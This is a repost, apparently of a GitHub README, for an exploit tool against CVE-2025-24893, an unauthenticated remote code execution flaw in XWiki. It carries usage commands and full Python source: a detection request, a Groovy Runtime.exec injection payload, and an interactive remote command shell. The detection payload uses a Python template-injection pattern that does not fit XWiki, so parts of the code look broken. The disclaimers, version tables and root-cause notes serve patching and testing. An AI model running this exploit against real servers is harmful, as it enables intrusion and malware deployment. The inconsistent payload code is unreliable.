news 2026/4/23 23:01:02

CVE-2025-24893 - XWiki 未授权远程代码执行漏洞检测与利用工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CVE-2025-24893 - XWiki 未授权远程代码执行漏洞检测与利用工具

CVE-2025-24893 - XWiki未授权RCE漏洞检测工具

📋 项目描述

这是一个针对CVE-2025-24893漏洞的检测与利用工具。CVE-2025-24893是一个影响XWiki平台的严重远程代码执行漏洞,允许未经身份验证的攻击者在目标系统上执行任意代码。该漏洞源于SolrSearch宏中的Groovy代码不安全评估,导致服务器端代码执行。

⚠️ 重要声明:本工具仅供授权的安全测试和教育目的使用。未经授权的使用是非法行为。

✨ 功能特性

  • 漏洞检测:自动检测目标XWiki实例是否存在CVE-2025-24893漏洞
  • 命令执行:支持在漏洞存在时执行系统命令
  • 交互模式:提供交互式shell界面进行多命令操作
  • 安全检测:使用无害的命令进行初步漏洞验证
  • 多平台支持:支持多种XWiki版本(5.3-milestone2至15.10.10,16.0.0-RC1至16.4.0)

📦 安装指南

系统要求

  • Python 3.x
  • requests库
  • 网络访问权限

安装步骤

  1. 确保系统已安装Python 3.x
  2. 安装必要的依赖:
pipinstallrequests
  1. 下载脚本文件:
gitclone https://github.com/B1ack4sh/Blackash-CVE-2025-24893.gitcdBlackash-CVE-2025-24893

🚀 使用说明

基础用法

# 1. 仅检测漏洞python3 cve-2025-24893.py http://your-lab-xwiki:8080# 2. 执行单条命令python3 cve-2025-24893.py http://target:8080whoami# 3. 进入交互模式python3 cve-2025-24893.py http://target:8080

使用示例

  1. 漏洞检测
python3 cve-2025-24893.py http://192.168.1.100:8080/
  1. 执行命令
python3 cve-2025-24893.py http://192.168.1.100:8080/"ls -la"
  1. 交互模式
python3 cve-2025-24893.py http://192.168.1.100:8080/ RCE $>whoamiRCE $>idRCE $>exit

注意事项

  • 仅在拥有所有权或获得明确授权的目标上使用
  • 使用前确保了解相关法律法规
  • 建议在测试环境中验证功能

💻 核心代码

1. 漏洞检测函数

defcheck_vulnerable(target):""" 检测目标XWiki实例是否存在CVE-2025-24893漏洞 Args: target: 目标URL Returns: bool: 如果存在漏洞返回True,否则返回False """url=f"{target.rstrip('/')}/bin/get/Main/SolrSearch"# 使用Python代码注入进行检测params={"search":"{{''.__class__.__mro__[1].__subclasses__()[414]('id', shell=True, capture_output=True).communicate()}}"}try:# 发送检测请求r=requests.get(url,params=params,timeout=15,verify=False,allow_redirects=False)# 检查响应中是否包含命令执行结果ifr.status_code==200and("uid="inr.textor"gid="inr.text):print("[+] VULNERABLE! Command output detected:")print(" "+r.text.strip().replace("\n","\n "))returnTrueelse:print("[-] Not vulnerable or command didn't return output.")returnFalseexceptExceptionase:print(f"[!] Request failed:{e}")returnFalse

2. 命令执行函数

defexecute_command(target,command):""" 在存在漏洞的目标上执行系统命令 Args: target: 目标URL command: 要执行的系统命令 """# Groovy RCE payload构造payload=f"#set($ex=$class.inspect('java.lang.Runtime').getRuntime().exec('{command}'))"payload+="#set($out=$ex.waitFor())#set($null=$ex.getInputStream().close())"# URL编码payloadencoded=urllib.parse.quote(payload,safe='')url=f"{target.rstrip('/')}/bin/get/Main/SolrSearch?search={encoded}&outputSyntax=plain"try:# 发送命令执行请求r=requests.get(url,timeout=20,verify=False,allow_redirects=False)ifr.status_code==200:print(f"[+] Command executed:{command}")print(f" Output:\n{r.text.strip()}")else:print(f"[-] HTTP{r.status_code}- No output or blocked")exceptExceptionase:print(f"[!] Error:{e}")

3. 主程序入口

if__name__=="__main__":# 显示工具bannerbanner()# 检查命令行参数iflen(sys.argv)<2:print("Usage: python3 cve-2025-24893.py http://xwiki-target.com [command]")print("Example: python3 cve-2025-24893.py http://192.168.1.100:8080/ whoami")sys.exit(1)target=sys.argv[1]print(f"[*] Target:{target}")# 步骤1: 漏洞检测(非破坏性)ifnotcheck_vulnerable(target):print("[*] Trying alternative detection...")# 回退检测方法:执行无害的ping命令execute_command(target,"ping -c 1 127.0.0.1")else:print("[+] Confirmed vulnerable!")# 步骤2: 交互模式或单命令执行iflen(sys.argv)>=3:cmd=" ".join(sys.argv[2:])execute_command(target,cmd)else:print("\n[+] Interactive shell mode (type 'exit' to quit)")whileTrue:try:cmd=input("RCE $> ")ifcmd.lower()in["exit","quit"]:breakifcmd.strip():execute_command(target,cmd)exceptKeyboardInterrupt:print("\nBye!")break

4. Banner显示函数

defbanner():""" 显示工具的ASCII艺术banner和基本信息 """print(r""" ██████╗ ██╗ █████╗ ██████╗ ██╗ ██╗ █████╗ ███████╗ ██╗ ██╗ ██╔══██╗ ██║ ██╔══██╗ ██╔════╝ ██║ ██╔╝ ██╔══██╗ ██╔════╝ ██║ ██║ ██████╔╝ ██║ ███████║ ██║ █████╔╝ ███████║ ███████╗ ███████║ ██╔══██╗ ██║ ██╔══██║ ██║ ██╔═██╗ ██╔══██║ ╚════██║ ██╔══██║ ██████╔╝ ███████╗ ██║ ██║ ╚██████╗ ██║ ██╗ ██║ ██║ ███████║ ██║ ██║ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝ ╚═╝ ╚═╝ CVE-2025-24893 Critical XWiki Remote Code Execution Vulnerability """)print(" Educational PoC - Only for authorized security testing!\n")

📊 受影响版本

❌ 受影响版本

XWiki版本系列受影响范围
5.x → 15.x5.3-milestone2 → 15.10.10
16.x16.0.0-RC1 → 16.4.0

✅ 已修复版本

安全版本说明
15.10.11LTS修复版本
16.4.1稳定分支修复
16.5.0-RC1开发分支修复

🔧 技术细节

漏洞组件

SolrSearch宏 → RSS渲染 → 用户控制文本的不安全评估

根本原因

  • ❌ 用户输入的不正确清理
  • ❌ Groovy代码动态评估
  • 导致CWE-94 + CWE-95(代码生成/评估注入)

漏洞利用

攻击者通过构造恶意搜索请求来滥用模板渲染功能,从而在服务器端执行任意代码。该漏洞已被用于真实攻击中部署恶意软件,如加密货币挖矿程序。
6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAP/Jlw6Em+eCYkkivuRs1AH
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 14:53:32

全面解析BAAI bge-large-zh-v1.5:中文语义理解的新标杆

全面解析BAAI bge-large-zh-v1.5&#xff1a;中文语义理解的新标杆 【免费下载链接】bge-large-zh-v1.5 项目地址: https://ai.gitcode.com/hf_mirrors/ai-gitcode/bge-large-zh-v1.5 在人工智能快速发展的今天&#xff0c;中文文本理解技术正成为推动智能化应用的关键…

作者头像 李华
网站建设 2026/4/23 9:30:06

人机环境系统态势感知的场效应

在人-机-环境系统态势感知中&#xff0c;场效应可定义为&#xff1a;以“态”&#xff08;标量事实&#xff09;和“感”&#xff08;标量感知&#xff09;为基础构建的标量场&#xff0c;与以“势”&#xff08;矢量趋势&#xff09;和“知”&#xff08;矢量价值&#xff09;…

作者头像 李华
网站建设 2026/4/17 18:14:59

如何高效管理Minecraft数据:NBTExplorer终极应用指南

如何高效管理Minecraft数据&#xff1a;NBTExplorer终极应用指南 【免费下载链接】NBTExplorer A graphical NBT editor for all Minecraft NBT data sources 项目地址: https://gitcode.com/gh_mirrors/nb/NBTExplorer 还在为复杂的Minecraft数据编辑而头疼吗&#xff…

作者头像 李华
网站建设 2026/4/23 10:08:12

PUBG罗技鼠标宏:从新手到高手的自动化射击体验

PUBG罗技鼠标宏&#xff1a;从新手到高手的自动化射击体验 【免费下载链接】logitech-pubg PUBG no recoil script for Logitech gaming mouse / 绝地求生 罗技 鼠标宏 项目地址: https://gitcode.com/gh_mirrors/lo/logitech-pubg 还记得第一次玩PUBG时&#xff0c;看着…

作者头像 李华
网站建设 2026/4/23 16:48:41

围棋AI分析工具LizzieYzy:从入门到精通的完整使用指南

围棋AI分析工具LizzieYzy&#xff1a;从入门到精通的完整使用指南 【免费下载链接】lizzieyzy LizzieYzy - GUI for Game of Go 项目地址: https://gitcode.com/gh_mirrors/li/lizzieyzy 围棋AI分析工具LizzieYzy是一款功能强大的开源软件&#xff0c;专为围棋爱好者和学…

作者头像 李华
网站建设 2026/4/21 1:22:32

高效罗技PUBG压枪配置完全指南

高效罗技PUBG压枪配置完全指南 【免费下载链接】logitech-pubg PUBG no recoil script for Logitech gaming mouse / 绝地求生 罗技 鼠标宏 项目地址: https://gitcode.com/gh_mirrors/lo/logitech-pubg 绝地求生罗技鼠标宏配置是一款专为提升射击稳定性而设计的智能辅助…

作者头像 李华